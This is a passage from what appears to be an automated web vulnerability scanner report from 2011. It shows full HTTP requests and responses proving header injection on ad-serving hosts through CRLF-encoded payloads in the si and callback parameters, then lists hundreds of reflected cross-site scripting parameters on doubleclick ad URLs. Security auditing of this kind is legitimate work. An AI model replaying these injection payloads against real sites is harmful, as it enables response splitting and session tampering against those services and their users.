Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload a1786%0d%0ac1d8d57dd13 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=OTH&si=a1786%0d%0ac1d8d57dd13&pi=L&xs=3&pu=http%253A//www.cbsnews.com/%253Fifu%253D&df=1&v=5.5&cb=50841 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; N=2:63136b7f5ed8fe53e6d4a6a9fc75f3cd,ff33ea61b6fcafb8c7a1e9f831635916; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50212^1^1304141664|50280^1^1304141756|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:09 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Wed, 27 Apr 2011 23:33:09 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sat, 21-Apr-12 23:18:09 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=50212^1^1304141664|50280^1^1304551089|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; path=/; expires=Wed, 04-May-11 23:18:09 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1303946289^1303948089|a1786
c1d8d57dd13^1303946289^1303948089; path=/; expires=Wed, 27-Apr-11 23:48:09 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; expires=Sat, 21-Apr-12 23:18:09 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ff33ea61b6fcafb8c7a1e9f831635916,5fe4d0c3901c5337a9498eac0b10cce3; expires=Sat, 21-Apr-12 23:18:09 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; expires=Sat, 21-Apr-12 23:18:09 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 242
Content-Type: application/x-javascript
Content-Length: 242

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|
...[SNIP]...

2.13. http://widgetserver.com/syndication/get_widget.js [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgetserver.com
Path:	/syndication/get_widget.js

Issue detail

The value of the callback request parameter is copied into the Location response header. The payload bb955%0d%0af888249c06b was submitted in the callback parameter. This caused a response containing an injected HTTP header.

Request

GET /syndication/get_widget.js?callback=bb955%0d%0af888249c06b&output=json&location=http%3A%2F%2Fwww.cbs.com%2F&timestamp=1303946101118&appId.0=cc396f99-ff24-4e7b-bd0c-32d96c3767c8 HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 27 Apr 2011 23:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/?callback=bb955
f888249c06b
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0

3. Cross-site scripting (reflected) previous
There are 865 instances of this issue:

http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [event parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [h parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [l parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [nd parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [o parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [oepartner parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [orh parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [p parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pdom parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pg parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pid parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pp parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ppartner parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pt parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ra parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [rqid parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sg parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [site parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sz parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [t parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [b parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [count parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [e parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [epartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [event parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [h parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [l parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [nd parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [o parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [oepartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [orh parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [p parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pdom parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pp parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ppartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pt parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ra parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [rqid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [site parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sz parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [t parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [b parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [count parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [e parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [epartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [event parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [h parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [l parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [nd parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [o parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [oepartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [orh parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [p parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pdom parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pp parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ppartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pt parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ra parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [rqid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [site parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sz parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [t parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [oepartner parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pid parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pp parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [rqid parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sg parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [t parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [b parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cid parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [count parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [e parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [epartner parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [event parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [h parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [l parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [nd parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [o parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [oepartner parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [orh parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [p parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pdom parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pg parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pid parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pp parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ppartner parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pt parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ra parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [rqid parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sg parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [site parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sz parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [t parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [b parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [count parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [e parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [epartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [event parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [h parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [l parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [nd parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [o parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [oepartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [orh parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [p parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pdom parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pp parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ppartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pt parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ra parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [rqid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [site parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sz parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [t parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [b parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [count parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [e parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [epartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [event parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [h parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [l parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [nd parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [o parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [oepartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [orh parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [p parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pdom parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pp parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ppartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pt parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ra parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [rqid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [site parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sz parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [t parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [b parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [count parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [e parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [epartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [event parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [h parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [l parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [nd parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [o parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [oepartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [orh parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [p parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pdom parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pp parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ppartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pt parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ra parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [rqid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [site parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sz parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [t parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [b parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cid parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [count parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [e parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [epartner parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [event parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [h parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [l parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [nd parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [o parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [oepartner parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [orh parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [p parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pdom parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pg parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pid parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pp parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ppartner parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pt parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ra parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [rqid parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sg parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [site parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sz parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [t parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [b parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cid parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [count parameter]
